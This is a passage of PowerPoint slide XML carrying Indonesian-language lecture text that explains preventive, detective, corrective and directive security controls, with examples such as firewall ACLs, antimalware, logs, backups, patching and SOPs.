              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ACL) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada firewall dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> antimalware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>preventif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Detektif-kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghalangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencatat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>percobaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Korektif-kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>korektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghilangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diklasifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>preventif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>detektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>korektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Arahan-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SOP). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
